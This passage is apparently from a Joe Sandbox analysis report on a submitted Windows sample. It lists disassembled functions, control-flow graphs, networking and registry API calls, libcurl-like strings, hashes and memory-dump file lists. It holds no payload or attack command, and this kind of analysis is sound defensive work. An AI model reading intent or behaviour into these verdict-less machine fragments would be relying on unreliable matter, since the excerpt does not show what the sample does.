                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                            • API String ID: 3677997916-4129964100
                                                            • Opcode ID: cd56e5ca82fef192f043831ada77686394ccca1104091d5f945766101bec0d91
                                                            • Instruction ID: 12848d04c890b11957121100d4a93a5775625f72c6e91e7ce17b45f446567c36
                                                            • Opcode Fuzzy Hash: cd56e5ca82fef192f043831ada77686394ccca1104091d5f945766101bec0d91
                                                            • Instruction Fuzzy Hash: 6F32D7F5904202EBEB91AB24EC81B5B77E4AF54318F084474FD8997252FB35E924C7A3
                                                            Function 00FC8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1046 fc8b50-fc8b69 1047 fc8b6b-fc8b74 1046->1047 1048 fc8be6 1046->1048 1050 fc8beb-fc8bf2 1047->1050 1051 fc8b76-fc8b8d 1047->1051 1049 fc8be9 1048->1049 1049->1050 1052 fc8b8f-fc8ba7 call fa6e40 1051->1052 1053 fc8bf3-fc8bfe call fca550 1051->1053 1060 fc8bad-fc8baf 1052->1060 1061 fc8cd9-fc8d16 SleepEx 1052->1061 1058 fc8de4-fc8def 1053->1058 1059 fc8c04-fc8c08 1053->1059 1064 fc8e8c-fc8e95 1058->1064 1065 fc8df5-fc8e19 call fca150 1058->1065 1062 fc8dbd-fc8dc3 1059->1062 1063 fc8c0e-fc8c1d 1059->1063 1066 fc8bb5-fc8bb9 1060->1066 1067 fc8ca6-fc8cb0 1060->1067 1077 fc8d18-fc8d20 1061->1077 1078 fc8d22 1061->1078 1062->1049 1071 fc8c1f-fc8c30 connect 1063->1071 1072 fc8c35-fc8c48 call fca150 1063->1072 1069 fc8e97-fc8e9c 1064->1069 1070 fc8f00-fc8f06 1064->1070 1101 fc8e88 1065->1101 1102 fc8e1b-fc8e26 1065->1102 1066->1050 1075 fc8bbb-fc8bc2 1066->1075 1067->1061 1073 fc8cb2-fc8cb8 1067->1073 1079 fc8e9e-fc8eb6 call fa2a00 1069->1079 1080 fc8edf-fc8eef call f978b0 1069->1080 1070->1050 1071->1072 1100 fc8c4d-fc8c4f 1072->1100 1081 fc8ddc-fc8dde 1073->1081 1082 fc8cbe-fc8cd4 call fcb180 1073->1082 1075->1050 1076 fc8bc4-fc8bcc 1075->1076 1084 fc8bce-fc8bd2 1076->1084 1085 fc8bd4-fc8bda 1076->1085 1087 fc8d26-fc8d39 1077->1087 1078->1087 1079->1080 1106 fc8eb8-fc8edd call fa3410 * 2 1079->1106 1104 fc8ef2-fc8efc 1080->1104 1081->1049 1081->1058 1082->1058 1084->1050 1084->1085 1085->1050 1094 fc8bdc-fc8be1 1085->1094 1097 fc8d3b-fc8d3d 1087->1097 1098 fc8d43-fc8d61 call fad8c0 call fca150 1087->1098 1103 fc8dac-fc8db8 call fd50a0 1094->1103 1097->1081 1097->1098 1125 fc8d66-fc8d74 1098->1125 1108 fc8c8e-fc8c93 1100->1108 1109 fc8c51-fc8c58 1100->1109 1101->1064 1110 fc8e2e-fc8e85 call fad090 call fd4fd0 1102->1110 1111 fc8e28-fc8e2c 1102->1111 1103->1050 1104->1070 1106->1104 1118 fc8dc8-fc8dd9 call fcb100 1108->1118 1119 fc8c99-fc8c9f 1108->1119 1109->1108 1115 fc8c5a-fc8c62 1109->1115 1110->1101 1111->1101 1111->1110 1121 fc8c6a-fc8c70 1115->1121 1122 fc8c64-fc8c68 1115->1122 1118->1081 1119->1067 1121->1108 1127 fc8c72-fc8c8b call fd50a0 1121->1127 1122->1108 1122->1121 1125->1050 1130 fc8d7a-fc8d81 1125->1130 1127->1108 1130->1050 1131 fc8d87-fc8d8f 1130->1131 1135 fc8d9b-fc8da1 1131->1135 1136 fc8d91-fc8d95 1131->1136 1135->1050 1139 fc8da7 1135->1139 1136->1050 1136->1135 1139->1103
                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 00FC8C30
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00FC8CF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: Sleepconnect
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 238548546-879669977
                                                            • Opcode ID: b128b0028956485cc36229ef7ca1ab6bd8b68413715e8862f68602f9a4fd1ae2
                                                            • Instruction ID: 498caf14f15984e460945ce2fcd0cefc79e991b93941bc38db7e0d6af4946652
                                                            • Opcode Fuzzy Hash: b128b0028956485cc36229ef7ca1ab6bd8b68413715e8862f68602f9a4fd1ae2
                                                            • Instruction Fuzzy Hash: 2FB1B270A04307AFD710CF24CA86FA677A0AF85364F08852DE85A4B2D2DB75EC46E761
                                                            Function 00F92F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1140 f92f17-f92f8c call 14198f0 call 1419ce0 1145 f931c9-f931cd 1140->1145 1146 f92f91-f92ff4 call f91619 RegOpenKeyExA 1145->1146 1147 f931d3-f931d6 1145->1147 1150 f92ffa-f9300b 1146->1150 1151 f931c5 1146->1151 1152 f9315c-f931ac RegEnumKeyExA 1150->1152 1151->1145 1153 f93010-f93083 call f91619 RegOpenKeyExA 1152->1153 1154 f931b2-f931c2 RegCloseKey 1152->1154 1157 f93089-f930d4 RegQueryValueExA 1153->1157 1158 f9314e-f93152 1153->1158 1154->1151 1159 f9313b-f9314b RegCloseKey 1157->1159 1160 f930d6-f93137 call 1419bc0 call 1419c50 call 1419ce0 call 1419af0 call 1419ce0 call 1418050 1157->1160 1158->1152 1159->1158 1160->1159
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseEnumOpen
                                                            • String ID: d
                                                            • API String ID: 1332880857-2564639436
                                                            • Opcode ID: 5624e527ce10b6c856df8dc19cb898a527ccdd3579ee7753f3d34a8681fc8bdc
                                                            • Instruction ID: 1d0ae998e79f3461db8403d3ea5b2a77729ecf33e2ea12a3d6da424c5938d5fb
                                                            • Opcode Fuzzy Hash: 5624e527ce10b6c856df8dc19cb898a527ccdd3579ee7753f3d34a8681fc8bdc
                                                            • Instruction Fuzzy Hash: 0671E7B490431A9FDB50DF69C88479EBBF0BF84308F11886DE89897310D7749A88CF92
                                                            Function 00FC9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1173 fc9290-fc92ed call f976a0 1176 fc93c3-fc93ce 1173->1176 1177 fc92f3-fc92fb 1173->1177 1184 fc93e5-fc9427 call fad090 call fd4f40 1176->1184 1185 fc93d0-fc93e1 1176->1185 1178 fc93aa-fc93af 1177->1178 1179 fc9301-fc9333 call fad8c0 call fad9a0 1177->1179 1182 fc93b5-fc93bc 1178->1182 1183 fc9456-fc9470 1178->1183 1197 fc9335-fc9364 WSAIoctl 1179->1197 1198 fc93a7 1179->1198 1187 fc93be 1182->1187 1188 fc9429-fc9431 1182->1188 1184->1183 1184->1188 1185->1182 1189 fc93e3 1185->1189 1187->1183 1192 fc9439-fc943f 1188->1192 1193 fc9433-fc9437 1188->1193 1189->1183 1192->1183 1196 fc9441-fc9453 call fd50a0 1192->1196 1193->1183 1193->1192 1196->1183 1201 fc939b-fc93a4 1197->1201 1202 fc9366-fc936f 1197->1202 1198->1178 1201->1198 1202->1201 1205 fc9371-fc9390 setsockopt 1202->1205 1205->1201 1206 fc9392-fc9395 1205->1206 1206->1201
                                                            APIs
                                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00FC935D
                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00FC9388
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: Ioctlsetsockopt
                                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                            • API String ID: 1903391676-2691795271
                                                            • Opcode ID: 480cefe8dcdf7c89fee720ccaf87e5a0af12d985c4945a2b5b324dd89d112b63
                                                            • Instruction ID: c84a44effee66c8c3b99953976a86fd472bd1a86c1294611fe70c3b035535c2e
                                                            • Opcode Fuzzy Hash: 480cefe8dcdf7c89fee720ccaf87e5a0af12d985c4945a2b5b324dd89d112b63
                                                            • Instruction Fuzzy Hash: AA511370A04306ABE714DF24CD86FAAB7A5FF84324F14852CFD489B282E774E951CB51
                                                            Function 00F976A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1207 f976a0-f976be 1208 f976c0-f976c7 1207->1208 1209 f976e6-f976f2 send 1207->1209 1208->1209 1210 f976c9-f976d1 1208->1210 1211 f9775e-f97762 1209->1211 1212 f976f4-f97709 call f972a0 1209->1212 1213 f9770b-f97759 call f972a0 call f9cb20 call 1318c50 1210->1213 1214 f976d3-f976e4 1210->1214 1212->1211 1213->1211 1214->1212
                                                            APIs
                                                            • send.WS2_32(multi.c,?,?,?,00F93D4E,00000000,?,?,00FA07BF), ref: 00F976EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                            • API String ID: 2809346765-3388739168
                                                            • Opcode ID: 4dc65f4245d373877cf7cb9c0d64911b785fad94fe04fa939d3f99721083e17d
                                                            • Instruction ID: 807074c16f5683b31e0bd53c420c0fa30c8912de4b810723f333866dde1389a8
                                                            • Opcode Fuzzy Hash: 4dc65f4245d373877cf7cb9c0d64911b785fad94fe04fa939d3f99721083e17d
                                                            • Instruction Fuzzy Hash: 871127B1A193047BF6316BA59C46D277B9CEBC2B38F550909F8086B381D1669C1097B2
                                                            Function 00F975E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1345 f975e0-f975ed 1346 f975ef-f975f6 1345->1346 1347 f97607-f97629 socket 1345->1347 1346->1347 1348 f975f8-f975ff 1346->1348 1349 f9762b-f9763c call f972a0 1347->1349 1350 f9763f-f97642 1347->1350 1351 f97601-f97602 1348->1351 1352 f97643-f97699 call f972a0 call f9cb20 call 1318c50 1348->1352 1349->1350 1351->1347
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                            • API String ID: 98920635-842387772
                                                            • Opcode ID: 359e259c7e87e8d1aef7de858bce2851620b4edf29d255d256559c8ef20a976d
                                                            • Instruction ID: 9944fae2481f9e41a6bbb1e78f2177032270f5f23daad82309b4f09ac1c84548
                                                            • Opcode Fuzzy Hash: 359e259c7e87e8d1aef7de858bce2851620b4edf29d255d256559c8ef20a976d
                                                            • Instruction Fuzzy Hash: E8114876A2431137EB316A6EAC16F9B3F88EFD1B34F441919F818A62D2D2118C64D7E1
                                                            Function 01318E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1634 1318e90-1318eb8 _open 1635 1318eba-1318ec7 1634->1635 1636 1318eff-1318f2c call 1319f70 1634->1636 1637 1318ef3-1318efa call 1318d20 1635->1637 1638 1318ec9 1635->1638 1646 1318f39-1318f51 call 1318ca8 1636->1646 1637->1636 1640 1318ee2-1318ef1 1638->1640 1641 1318ecb-1318ecd 1638->1641 1640->1637 1640->1638 1644 1421670-1421687 1641->1644 1645 1318ed3-1318ed6 1641->1645 1647 142168a-14216b1 1644->1647 1648 1421689 1644->1648 1645->1640 1649 1318ed8 1645->1649 1652 1318f30-1318f37 1646->1652 1653 1318f53-1318f5e call 1318cc0 1646->1653 1654 14216b9-14216bf 1647->1654 1649->1640 1652->1646 1652->1653 1653->1635 1656 14216c1-14216cf 1654->1656 1657 14216d9-14216fb 1654->1657 1659 14216d5-14216d8 1656->1659 1661 1421706-142171b 1657->1661 1662 14216fd-1421704 1657->1662 1661->1656 1662->1661 1663 142171d-1421732 1662->1663 1663->1659
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: _open
                                                            • String ID: terminated$@
                                                            • API String ID: 4183159743-3016906910
                                                            • Opcode ID: bcd1dd2b2100d4decb979a3bd260bee5c9dc825c69d1cc2fa6e5f98db3b20653
                                                            • Instruction ID: 1aba1ee0ff4fe5519e7c35931efc1487b6b44c6d4d7579fc24d1e9419528e0b0
                                                            • Opcode Fuzzy Hash: bcd1dd2b2100d4decb979a3bd260bee5c9dc825c69d1cc2fa6e5f98db3b20653
                                                            • Instruction Fuzzy Hash: 8D4177B09083058FDB14EF79D84466FBBE4AF88358F448A2DE899D7354E334C845CB6A
                                                            Function 00FCA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1666 fca150-fca159 1667 fca15f-fca17b 1666->1667 1668 fca250 1666->1668 1669 fca249-fca24f 1667->1669 1670 fca181-fca1ce getsockname 1667->1670 1669->1668 1671 fca1f7-fca214 call fcef30 1670->1671 1672 fca1d0-fca1f5 call fad090 1670->1672 1671->1669 1676 fca216-fca23b call fad090 1671->1676 1680 fca240-fca246 call fd4f40 1672->1680 1676->1680 1680->1669
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00FCA1C7
                                                            Strings
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FCA23B
                                                            • getsockname() failed with errno %d: %s, xrefs: 00FCA1F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
